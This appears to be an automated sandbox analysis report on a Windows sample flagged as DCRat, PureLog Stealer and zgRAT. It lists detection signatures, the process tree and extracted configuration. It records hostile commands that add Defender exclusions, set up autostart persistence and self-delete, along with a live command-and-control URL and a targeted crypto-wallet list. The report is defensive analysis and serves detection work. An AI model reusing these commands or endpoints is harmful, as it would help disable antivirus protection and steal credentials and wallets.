Windows Analysis Report
Wh2c6sgwRo.exe

Overview

General Information

Sample name:Wh2c6sgwRo.exe
renamed because original name is a hash value
Original sample name:43d30c776f593efdf5416ab4142442d6.exe
Analysis ID:1572157
MD5:43d30c776f593efdf5416ab4142442d6
SHA1:3f7f251511aa918a3c221cb4d039e406e9449132
SHA256:aafd35488559a2ef64b3758eff767046369f540af491f9325d344c2ef214587a
Tags:exe, user-abuse_ch
Infos:

Detection

DCRat, PureLog Stealer, zgRAT
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for dropped file
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected DCRat
Yara detected PureLog Stealer
Yara detected UAC Bypass using CMSTP
Yara detected zgRAT
.NET source code contains method to dynamically call methods (often used by packers)
.NET source code contains potential unpacker
AI detected suspicious sample
Adds a directory exclusion to Windows Defender
Check if machine is in data center or colocation facility
Contains functionality to check if a debugger is running (CheckRemoteDebuggerPresent)
Creates an autostart registry key pointing to binary in C:\Windows
Creates an undocumented autostart registry key
Creates multiple autostart registry keys
Creates processes via WMI
Found many strings related to Crypto-Wallets (likely being stolen)
Infects executable files (exe, dll, sys, html)
Loading BitLocker PowerShell Module
Machine Learning detection for dropped file
Machine Learning detection for sample
Queries sensitive Plug and Play Device Information (via WMI, Win32_PnPEntity, often done to detect virtual machines)
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Sample uses string decryption to hide its real strings
Self deletion via cmd or bat file
Sigma detected: Dot net compiler compiles file from suspicious location
Sigma detected: Files With System Process Name In Unsuspected Locations
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to harvest and steal browser information (history, passwords, etc)
Uses ping.exe to check the status of other devices and networks
Uses ping.exe to sleep
AV process strings found (often used to terminate AV products)
Allocates memory with a write watch (potentially for evading sandboxes)
Binary contains a suspicious time stamp
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Checks if the current process is being debugged
Compiles C# or VB.Net code
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a window with clipboard capturing capabilities
Creates files inside the system directory
Deletes files inside the Windows folder
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Drops PE files
Drops PE files to the application program directory (C:\ProgramData)
Drops PE files to the windows directory (C:\Windows)
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
Queries disk information (often used to detect virtual machines)
Queries information about the installed CPU (vendor, model number etc)
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: CurrentVersion NT Autorun Keys Modification
Sigma detected: Dynamic .NET Compilation Via Csc.EXE
Sigma detected: Powershell Defender Exclusion
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer
Yara signature match

Classification

  • System is w10x64
  • Wh2c6sgwRo.exe (PID: 7520 cmdline: "C:\Users\user\Desktop\Wh2c6sgwRo.exe" MD5: 43D30C776F593EFDF5416AB4142442D6)
    • d3yngi1q.wji.exe (PID: 7768 cmdline: "C:\Users\user\AppData\Local\Temp\d3yngi1q.wji.exe" MD5: 02E08842C25F66B1FFE53CE0F50F1758)
      • csc.exe (PID: 7952 cmdline: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\obsldskd\obsldskd.cmdline" MD5: F65B029562077B648A6A5F6A1AA76A66)
        • conhost.exe (PID: 7960 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • cvtres.exe (PID: 8012 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES459B.tmp" "c:\Program Files (x86)\Microsoft\Edge\Application\CSCA62F8F92906C4C64B352C63DFBD9F59.TMP" MD5: C877CBB966EA5939AA2A17B6A5160950)
      • csc.exe (PID: 8052 cmdline: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\zrf14fw5\zrf14fw5.cmdline" MD5: F65B029562077B648A6A5F6A1AA76A66)
        • conhost.exe (PID: 8060 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • cvtres.exe (PID: 8112 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES4770.tmp" "c:\Windows\System32\CSC533681BDB06443E789816E6615DEB19.TMP" MD5: C877CBB966EA5939AA2A17B6A5160950)
      • powershell.exe (PID: 1568 cmdline: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\All Users\fontdrvhost.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)
        • conhost.exe (PID: 1736 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • powershell.exe (PID: 1796 cmdline: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Windows\Help\Corporate\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)
        • conhost.exe (PID: 1904 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • powershell.exe (PID: 1824 cmdline: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\microsoft.net\Primary Interop Assemblies\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)
        • conhost.exe (PID: 2056 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • powershell.exe (PID: 4040 cmdline: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Recovery\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)
        • conhost.exe (PID: 2160 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • WmiPrvSE.exe (PID: 7920 cmdline: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding MD5: 60FF40CFD7FB8FE41EE4FE9AE5FE1C51)
      • powershell.exe (PID: 2060 cmdline: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\windows mail\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)
        • conhost.exe (PID: 2288 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • cmd.exe (PID: 5164 cmdline: "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\dmMZ8RlPbE.bat" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 3428 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • chcp.com (PID: 3456 cmdline: chcp 65001 MD5: 33395C4732A49065EA72590B14B64F32)
        • PING.EXE (PID: 4940 cmdline: ping -n 10 localhost MD5: 2F46799D79D22AC72C241EC0322B011D)
    • cmd.exe (PID: 7796 cmdline: "C:\Windows\System32\cmd.exe" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\user\Desktop\Wh2c6sgwRo.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 7804 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • choice.exe (PID: 7848 cmdline: choice /C Y /N /D Y /T 3 MD5: 1A9804F0C374283B094E9E55DC5EE128)
  • fontdrvhost.exe (PID: 3116 cmdline: "C:\Users\All Users\fontdrvhost.exe" MD5: 02E08842C25F66B1FFE53CE0F50F1758)
  • fontdrvhost.exe (PID: 2352 cmdline: "C:\Users\All Users\fontdrvhost.exe" MD5: 02E08842C25F66B1FFE53CE0F50F1758)
  • fontdrvhost.exe (PID: 8068 cmdline: "C:\Users\All Users\fontdrvhost.exe" MD5: 02E08842C25F66B1FFE53CE0F50F1758)
  • svchost.exe (PID: 8164 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
  • fontdrvhost.exe (PID: 2616 cmdline: "C:\Users\All Users\fontdrvhost.exe" MD5: 02E08842C25F66B1FFE53CE0F50F1758)
  • fontdrvhost.exe (PID: 7976 cmdline: "C:\Users\All Users\fontdrvhost.exe" MD5: 02E08842C25F66B1FFE53CE0F50F1758)
  • cleanup
{"C2 url": "http://147.45.47.151/AsyncPrivategeneratorGenerator/generatorphp/Downloads/Request/videoPublicDownloadsBase/ImageApilinux", "Params": {"0": "{SYSTEMDRIVE}/Users/", "1": "false", "2": "false", "3": "true", "4": "true", "5": "true", "6": "true", "7": "false", "8": "true", "9": "true", "10": "true", "11": "true", "12": "true", "13": "true", "14": "true"}}
Source | Rule | Description | Author | Strings
Wh2c6sgwRo.exe | JoeSecurity_zgRAT_1 | Yara detected zgRAT | Joe Security |
Wh2c6sgwRo.exe | JoeSecurity_PureLogStealer | Yara detected PureLog Stealer | Joe Security |
Wh2c6sgwRo.exe | MALWARE_Win_zgRAT | Detects zgRAT | ditekSHen |
  • 0x55d47:$s1: file:///
  • 0x55c33:$s2: {11111-22222-10009-11112}
  • 0x55cd7:$s3: {11111-22222-50001-00000}
  • 0x51524:$s4: get_Module
  • 0x51c04:$s5: Reverse
  • 0x4bace:$s6: BlockCopy
  • 0x5207c:$s7: ReadByte
  • 0x55d59:$s8: 4C 00 6F 00 63 00 61 00 74 00 69 00 6F 00 6E 00 00 0B 46 00 69 00 6E 00 64 00 20 00 00 13 52 00 65 00 73 00 6F 00 75 00 72 00 63 00 65 00 41 00 00 11 56 00 69 00 72 00 74 00 75 00 61 00 6C 00 ...

Source | Rule | Description | Author | Strings
C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exe | JoeSecurity_DCRat_1 | Yara detected DCRat | Joe Security |
C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exe | JoeSecurity_DCRat_1 | Yara detected DCRat | Joe Security |
C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exe | JoeSecurity_DCRat_1 | Yara detected DCRat | Joe Security |
C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exe | JoeSecurity_DCRat_1 | Yara detected DCRat | Joe Security |
C:\ProgramData\fontdrvhost.exe | JoeSecurity_DCRat_1 | Yara detected DCRat | Joe Security |

Source | Rule | Description | Author | Strings
00000000.00000002.1609904365.0000019061D91000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security |
00000000.00000002.1609904365.0000019061D91000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_UACBypassusingCMSTP | Yara detected UAC Bypass using CMSTP | Joe Security |
00000002.00000000.1547271116.0000000000CF2000.00000002.00000001.01000000.00000007.sdmp | JoeSecurity_DCRat_1 | Yara detected DCRat | Joe Security |
00000000.00000000.1418594888.000001905FF02000.00000002.00000001.01000000.00000003.sdmp | JoeSecurity_PureLogStealer | Yara detected PureLog Stealer | Joe Security |
Process Memory Space: Wh2c6sgwRo.exe PID: 7520 | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security |

Source | Rule | Description | Author | Strings
0.0.Wh2c6sgwRo.exe.1905ff00000.0.unpack | JoeSecurity_zgRAT_1 | Yara detected zgRAT | Joe Security |
0.0.Wh2c6sgwRo.exe.1905ff00000.0.unpack | JoeSecurity_PureLogStealer | Yara detected PureLog Stealer | Joe Security |
0.0.Wh2c6sgwRo.exe.1905ff00000.0.unpack | MALWARE_Win_zgRAT | Detects zgRAT | ditekSHen |
  • 0x55d47:$s1: file:///
  • 0x55c33:$s2: {11111-22222-10009-11112}
  • 0x55cd7:$s3: {11111-22222-50001-00000}
  • 0x51524:$s4: get_Module
  • 0x51c04:$s5: Reverse
  • 0x4bace:$s6: BlockCopy
  • 0x5207c:$s7: ReadByte
  • 0x55d59:$s8: 4C 00 6F 00 63 00 61 00 74 00 69 00 6F 00 6E 00 00 0B 46 00 69 00 6E 00 64 00 20 00 00 13 52 00 65 00 73 00 6F 00 75 00 72 00 63 00 65 00 41 00 00 11 56 00 69 00 72 00 74 00 75 00 61 00 6C 00 ...
2.0.d3yngi1q.wji.exe.cf0000.0.unpack | JoeSecurity_DCRat_1 | Yara detected DCRat | Joe Security |

                                System Summary

                                Source: File createdAuthor: Sander Wiebing, Tim Shelton, Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Users\user\AppData\Local\Temp\d3yngi1q.wji.exe, ProcessId: 7768, TargetFilename: C:\Users\All Users\fontdrvhost.exe
                                Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\All Users\fontdrvhost.exe', CommandLine: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\All Users\fontdrvhost.exe', CommandLine|base64offset|contains: *&, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\d3yngi1q.wji.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\d3yngi1q.wji.exe, ParentProcessId: 7768, ParentProcessName: d3yngi1q.wji.exe, ProcessCommandLine: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\All Users\fontdrvhost.exe', ProcessId: 1568, ProcessName: powershell.exe
                                Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: "C:\Users\All Users\fontdrvhost.exe", EventID: 13, EventType: SetValue, Image: C:\Users\user\AppData\Local\Temp\d3yngi1q.wji.exe, ProcessId: 7768, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\fontdrvhost
                                Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: explorer.exe, "C:\Users\All Users\fontdrvhost.exe", EventID: 13, EventType: SetValue, Image: C:\Users\user\AppData\Local\Temp\d3yngi1q.wji.exe, ProcessId: 7768, TargetObject: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell
                                Source: Process startedAuthor: Florian Roth (Nextron Systems), X__Junior (Nextron Systems): Data: Command: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\obsldskd\obsldskd.cmdline", CommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\obsldskd\obsldskd.cmdline", CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\d3yngi1q.wji.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\d3yngi1q.wji.exe, ParentProcessId: 7768, ParentProcessName: d3yngi1q.wji.exe, ProcessCommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\obsldskd\obsldskd.cmdline", ProcessId: 7952, ProcessName: csc.exe
                                Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\All Users\fontdrvhost.exe', CommandLine: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\All Users\fontdrvhost.exe', CommandLine|base64offset|contains: *&, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\d3yngi1q.wji.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\d3yngi1q.wji.exe, ParentProcessId: 7768, ParentProcessName: d3yngi1q.wji.exe, ProcessCommandLine: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\All Users\fontdrvhost.exe', ProcessId: 1568, ProcessName: powershell.exe
                                Source: File createdAuthor: frack113: Data: EventID: 11, Image: C:\Users\user\AppData\Local\Temp\d3yngi1q.wji.exe, ProcessId: 7768, TargetFilename: C:\Users\user\AppData\Local\Temp\obsldskd\obsldskd.cmdline
                                Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\All Users\fontdrvhost.exe', CommandLine: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\All Users\fontdrvhost.exe', CommandLine|base64offset|contains: *&, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\d3yngi1q.wji.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\d3yngi1q.wji.exe, ParentProcessId: 7768, ParentProcessName: d3yngi1q.wji.exe, ProcessCommandLine: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\All Users\fontdrvhost.exe', ProcessId: 1568, ProcessName: powershell.exe
                                Source: Process startedAuthor: vburov: Data: Command: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 624, ProcessCommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, ProcessId: 8164, ProcessName: svchost.exe

                                Data Obfuscation

                                Source: Process startedAuthor: Joe Security: Data: Command: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\obsldskd\obsldskd.cmdline", CommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\obsldskd\obsldskd.cmdline", CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\d3yngi1q.wji.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\d3yngi1q.wji.exe, ParentProcessId: 7768, ParentProcessName: d3yngi1q.wji.exe, ProcessCommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\obsldskd\obsldskd.cmdline", ProcessId: 7952, ProcessName: csc.exe
                                Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
                                2024-12-10T07:28:13.983208+0100 | 2048095 | 1 | A Network Trojan was detected | 192.168.2.8 | 49713 | 147.45.47.151 | 80 | TCP
                                2024-12-10T07:28:31.389464+0100 | 2048130 | 1 | A Network Trojan was detected | 192.168.2.8 | 49728 | 147.45.47.151 | 80 | TCP

                                AV Detection

                                Source: Wh2c6sgwRo.exeAvira: detected
                                Source: C:\ProgramData\fontdrvhost.exeAvira: detection malicious, Label: HEUR/AGEN.1309961
                                Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exeAvira: detection malicious, Label: HEUR/AGEN.1309961
                                Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exeAvira: detection malicious, Label: HEUR/AGEN.1309961
                                Source: C:\Users\user\AppData\Local\Temp\dmMZ8RlPbE.batAvira: detection malicious, Label: BAT/Delbat.C
                                Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exeAvira: detection malicious, Label: HEUR/AGEN.1309961
                                Source: C:\Users\user\AppData\Local\Temp\d3yngi1q.wji.exeAvira: detection malicious, Label: HEUR/AGEN.1309961
                                Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exeAvira: detection malicious, Label: HEUR/AGEN.1309961
                                Source: 2.0.d3yngi1q.wji.exe.cf0000.0.unpackMalware Configuration Extractor: DCRat {"C2 url": "http://147.45.47.151/AsyncPrivategeneratorGenerator/generatorphp/Downloads/Request/videoPublicDownloadsBase/ImageApilinux", "Params": {"0": "{SYSTEMDRIVE}/Users/", "1": "false", "2": "false", "3": "true", "4": "true", "5": "true", "6": "true", "7": "false", "8": "true", "9": "true", "10": "true", "11": "true", "12": "true", "13": "true", "14": "true"}}
                                Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exeReversingLabs: Detection: 75%
                                Source: C:\Program Files (x86)\Windows Mail\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exeReversingLabs: Detection: 75%
                                Source: C:\ProgramData\fontdrvhost.exeReversingLabs: Detection: 75%
                                Source: C:\Recovery\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exeReversingLabs: Detection: 75%
                                Source: C:\Users\user\AppData\Local\Temp\d3yngi1q.wji.exeReversingLabs: Detection: 75%
                                Source: C:\Windows\Help\Corporate\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exeReversingLabs: Detection: 75%
                                Source: Wh2c6sgwRo.exeReversingLabs: Detection: 63%
                                Source: Wh2c6sgwRo.exeVirustotal: Detection: 77%
                                Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                                Source: C:\ProgramData\fontdrvhost.exeJoe Sandbox ML: detected
                                Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exeJoe Sandbox ML: detected
                                Source: C:\Windows\System32\SecurityHealthSystray.exeJoe Sandbox ML: detected
                                Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exeJoe Sandbox ML: detected
                                Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeJoe Sandbox ML: detected
                                Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exeJoe Sandbox ML: detected
                                Source: C:\Users\user\AppData\Local\Temp\d3yngi1q.wji.exeJoe Sandbox ML: detected
                                Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exeJoe Sandbox ML: detected
                                Source: Wh2c6sgwRo.exeJoe Sandbox ML: detected
                                Source: 2.0.d3yngi1q.wji.exe.cf0000.0.unpackString decryptor: {"0":[],"2a025748-b498-4ae9-8f8c-b763dd8b5ffc":{"_0":"Full","_1":"False","_2":"False","_3":"False"},"31395ecd-4eed-48b9-a47f-81dbcc84ccdf":{"_0":"True","_1":"nkbihfbeogaeaoehlefnkodbefgpgknn:MetaMask\nejbalbakoplchlghecdalmeeeajnimhm:MetaMask\nibnejdfjmmkpcnlpebklmnkoeoihofec:TronLink\nfnjhmkhhmkbjkkabndcnnogagogbneec:Ronin\nkjmoohlgokccodicjjfebfomlbljgfhk:Ronin\nfhbohimaelbohpjbbldcngcnapndodjp:BinanceChain\nbfnaelmomeimhlpmgjnjophhpkkoljpa:Phantom\nnphplpgoakhhjchkkhmiggakijnkhfnd:TONWeb\nffnbelfdoeiohenkjibnmadjiehjhajb:Yoroi\nakoiaibnepcedcplijmiamnaigbepmcb:Yoroi\nafbcbjpbpfadlkmhmclhkeeodmamcflc:MathWallet\nhnfanknocfeofbddgcijnmhnfnkdnaad:Coinbase\nimloifkgjagghnncjkhggdhalmcnfklk:TrezorPM\nilgcnhelpchnceeipipijaljkblbcobl:GAuth\noeljdldpnmdbchonielidgobddffflal:EOS\ncjelfplplebdjjenllpjcblmjkfcffne:JaxxLiberty\nlgmpcpglpngdoalbgeoldeajfclnhafa:SafePal\naholpfdialjgjfhomihkjbmgjidlcdno:Exodus","_2":"All Users","_3":"True"},"ff275d84-13f9-47b8-9de6-a3dfeab3ea1e":{"_0":"Builds","_1":""}}
                                Source: 2.0.d3yngi1q.wji.exe.cf0000.0.unpackString decryptor: ["HNto09huzqp83QdVrE0WyHByCNs9y8zHCzvd9I2B0Kmuv3DiEv587qDAL4mmQh511h6Ef9VjMygoeRCJKK5DC0KWwvSFfPuSOv2O69DEZWwIJZf42dcGm2yBWkStrQD7","3e5e94f0e11171c3961d1e5f3808d36c9dca912cf9a303ebba50229f9f225d68","0","topv2dc","","5","2","WyIxIiwiIiwiNSJd","WyIxIiwiV3lJaUxDSWlMQ0psZVVsM1NXcHZhV1V4VGxwVk1WSkdWRlZTVTFOV1drWm1VemxXWXpKV2VXTjVPR2xNUTBsNFNXcHZhVnB0Um5Oak1sVnBURU5KZVVscWIybGFiVVp6WXpKVmFVeERTWHBKYW05cFpFaEtNVnBUU1hOSmFsRnBUMmxLTUdOdVZteEphWGRwVGxOSk5rbHVVbmxrVjFWcFRFTkpNa2xxYjJsa1NFb3hXbE5KYzBscVkybFBhVXB0V1ZkNGVscFRTWE5KYW1kcFQybEtNR051Vm14SmFYZHBUMU5KTmtsdVVubGtWMVZwVEVOSmVFMURTVFpKYmxKNVpGZFZhVXhEU1hoTlUwazJTVzVTZVdSWFZXbE1RMGw0VFdsSk5rbHVVbmxrVjFWcFRFTkplRTE1U1RaSmJsSjVaRmRWYVV4RFNYaE9RMGsyU1c1U2VXUlhWV2xtVVQwOUlsMD0iXQ=="]
                                Source: 2.0.d3yngi1q.wji.exe.cf0000.0.unpackString decryptor: [["http://147.45.47.151/AsyncPrivategeneratorGenerator/generatorphp/Downloads/Request/videoPublicDownloadsBase/","ImageApilinux"]]

                                Exploits

                                Source: Yara matchFile source: 00000000.00000002.1609904365.0000019061D91000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: Process Memory Space: Wh2c6sgwRo.exe PID: 7520, type: MEMORYSTR
                                Source: Wh2c6sgwRo.exeStatic PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                                Source: unknownHTTPS traffic detected: 91.149.219.45:443 -> 192.168.2.8:49706 version: TLS 1.2
                                Source: Wh2c6sgwRo.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                Source: Binary string: 8C:\Users\user\AppData\Local\Temp\obsldskd\obsldskd.pdb source: d3yngi1q.wji.exe, 00000002.00000002.1641016699.00000000035D2000.00000004.00000800.00020000.00000000.sdmp
                                Source: Binary string: 8C:\Users\user\AppData\Local\Temp\zrf14fw5\zrf14fw5.pdb source: d3yngi1q.wji.exe, 00000002.00000002.1641016699.00000000035D2000.00000004.00000800.00020000.00000000.sdmp

                                Spreading

                                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, System file written: C:\Windows\System32\SecurityHealthSystray.exe
                                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, System file written: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
